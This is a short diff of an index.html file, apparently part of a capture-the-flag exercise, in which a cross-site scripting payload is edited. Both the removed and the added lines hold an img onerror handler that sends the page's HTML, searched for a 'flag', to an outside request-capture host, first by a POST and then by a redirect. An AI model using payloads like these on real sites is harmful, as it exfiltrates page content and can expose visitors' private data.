--- a/index.html
+++ b/index.html
@@ -1,7 +1,6 @@
 <html>
  <body>
    	<script>this.document.title = "a"; this.document.title = "
-	<img src="a" onerror=" if (document.documentElement.innerHTML.indexOf("flag") !== -1) fetch("https://alexyqiu.free.beeceptor.com", {method: "POST", headers: {"Content-Type": "application/x-www-form-urlencoded"}, body: "content=" + encodeURIComponent(document.documentElement.innerHTML)});">
-	"</script>
+	<img src="a" onerror="location.href='https://alexyqiu.free.beeceptor.com'+document.body.innerHTML;"</script>
 </body>
 </html>
